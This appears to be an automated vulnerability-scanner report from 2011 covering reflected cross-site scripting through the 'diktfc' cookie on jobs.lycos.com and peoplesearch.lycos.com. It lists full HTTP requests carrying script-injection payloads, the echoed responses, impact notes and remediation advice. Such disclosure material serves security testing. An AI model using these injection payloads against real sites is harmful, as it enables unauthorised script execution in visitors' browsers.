GET /browse HTTP/1.1 Host: jobs.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B751024a1c"%3balert(1)//587ec8ec026; CORE-STICKY=R3839803822; __utmz=1.1297090290.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LycosJobs=iitpttomiuvqsudrh267lm8k70; __utma=1.1087446052.1297090290.1297090290.1297090290.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090290;
Response
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839803822; path=/ Date: Mon, 07 Feb 2011 15:22:55 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16639
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 444b1"><script>alert(1)</script>f0af773face was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /browse HTTP/1.1 Host: jobs.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510444b1"><script>alert(1)</script>f0af773face; CORE-STICKY=R3839803822; __utmz=1.1297090290.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LycosJobs=iitpttomiuvqsudrh267lm8k70; __utma=1.1087446052.1297090290.1297090290.1297090290.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090290;
Response
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839803822; path=/ Date: Mon, 07 Feb 2011 15:22:55 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:22:55 GMT; path=/ Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16669
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=jobs.lycos.com/browse&c5=&c6=&c15=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510444b1"><script>alert(1)</script>f0af773face.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efb7a"%3balert(1)//aaf82328234 was submitted in the diktfc cookie. This input was echoed as efb7a";alert(1)//aaf82328234 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jobs/post HTTP/1.1 Host: jobs.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510efb7a"%3balert(1)//aaf82328234; CORE-STICKY=R3839803822; __utmz=1.1297090290.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LycosJobs=iitpttomiuvqsudrh267lm8k70; __utma=1.1087446052.1297090290.1297090290.1297090290.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090290;
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839803822; path=/ Date: Mon, 07 Feb 2011 15:23:31 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 13283
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c730d"><script>alert(1)</script>02d27a785f8 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /jobs/post HTTP/1.1 Host: jobs.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510c730d"><script>alert(1)</script>02d27a785f8; CORE-STICKY=R3839803822; __utmz=1.1297090290.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LycosJobs=iitpttomiuvqsudrh267lm8k70; __utma=1.1087446052.1297090290.1297090290.1297090290.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090290;
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839803822; path=/ Date: Mon, 07 Feb 2011 15:23:27 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:23:28 GMT; path=/ Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 13313
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46262"%3balert(1)//7f8ba8a80c0 was submitted in the diktfc cookie. This input was echoed as 46262";alert(1)//7f8ba8a80c0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search?q={searchTerms}&src=OS HTTP/1.1 Host: jobs.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B751046262"%3balert(1)//7f8ba8a80c0; CORE-STICKY=R3839803822; __utmz=1.1297090290.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LycosJobs=iitpttomiuvqsudrh267lm8k70; __utma=1.1087446052.1297090290.1297090290.1297090290.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090290;
Response
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839803822; path=/ Date: Mon, 07 Feb 2011 15:23:46 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:23:47 GMT; path=/ Set-Cookie: PARTNER=os Set-Cookie: PARTNER=deleted; expires=Sun, 07-Feb-2010 15:23:46 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 12116
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8ae8"><script>alert(1)</script>61da473b896 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /search?q={searchTerms}&src=OS HTTP/1.1 Host: jobs.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510f8ae8"><script>alert(1)</script>61da473b896; CORE-STICKY=R3839803822; __utmz=1.1297090290.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LycosJobs=iitpttomiuvqsudrh267lm8k70; __utma=1.1087446052.1297090290.1297090290.1297090290.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090290;
Response
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839803822; path=/ Date: Mon, 07 Feb 2011 15:23:44 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:23:45 GMT; path=/ Set-Cookie: PARTNER=os Set-Cookie: PARTNER=deleted; expires=Sun, 07-Feb-2010 15:23:44 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 12146
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44845"><script>alert(1)</script>5e67d3efdef was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: peoplesearch.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B751044845"><script>alert(1)</script>5e67d3efdef; __utmz=1.1297090288.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1736142971.1297090288.1297090288.1297090288.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090288;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:23:44 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19435
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=peoplesearch.lycos.com/index.php&c5=&c6=&c15=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B751044845"><script>alert(1)</script>5e67d3efdef.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3efd"%3balert(1)//e6b3b4255a6 was submitted in the diktfc cookie. This input was echoed as d3efd";alert(1)//e6b3b4255a6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: peoplesearch.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510d3efd"%3balert(1)//e6b3b4255a6; __utmz=1.1297090288.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1736142971.1297090288.1297090288.1297090288.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090288;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:23:44 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19405
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da2fd"%3balert(1)//35116297bfb was submitted in the diktfc cookie. This input was echoed as da2fd";alert(1)//35116297bfb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bootstrap.js HTTP/1.1 Host: peoplesearch.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510da2fd"%3balert(1)//35116297bfb; __utmz=1.1297090288.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1736142971.1297090288.1297090288.1297090288.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090288;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:23:51 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19417
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee85d"><script>alert(1)</script>073a1cde23e was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bootstrap.js HTTP/1.1 Host: peoplesearch.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510ee85d"><script>alert(1)</script>073a1cde23e; __utmz=1.1297090288.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1736142971.1297090288.1297090288.1297090288.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090288;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:23:51 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19447
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=peoplesearch.lycos.com/index.php&c5=&c6=&c15=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510ee85d"><script>alert(1)</script>073a1cde23e.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d324"><script>alert(1)</script>537b7731da5 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /frontdoor HTTP/1.1 Host: peoplesearch.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B75103d324"><script>alert(1)</script>537b7731da5; __utmz=1.1297090288.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1736142971.1297090288.1297090288.1297090288.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090288;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:23:46 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19444
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=peoplesearch.lycos.com/index.php&c5=&c6=&c15=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B75103d324"><script>alert(1)</script>537b7731da5.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6dc0a"%3balert(1)//2f674e851f2 was submitted in the diktfc cookie. This input was echoed as 6dc0a";alert(1)//2f674e851f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /frontdoor HTTP/1.1 Host: peoplesearch.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B75106dc0a"%3balert(1)//2f674e851f2; __utmz=1.1297090288.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1736142971.1297090288.1297090288.1297090288.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090288;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:23:46 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19414
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 969d9"><script>alert(1)</script>f995044edeb was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.php HTTP/1.1 Host: peoplesearch.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510969d9"><script>alert(1)</script>f995044edeb; __utmz=1.1297090288.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1736142971.1297090288.1297090288.1297090288.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090288;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:23:49 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19444
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=peoplesearch.lycos.com/index.php&c5=&c6=&c15=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510969d9"><script>alert(1)</script>f995044edeb.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb78f"%3balert(1)//6dcd67b6575 was submitted in the diktfc cookie. This input was echoed as eb78f";alert(1)//6dcd67b6575 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.php HTTP/1.1 Host: peoplesearch.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510eb78f"%3balert(1)//6dcd67b6575; __utmz=1.1297090288.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1736142971.1297090288.1297090288.1297090288.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090288;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:23:49 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19414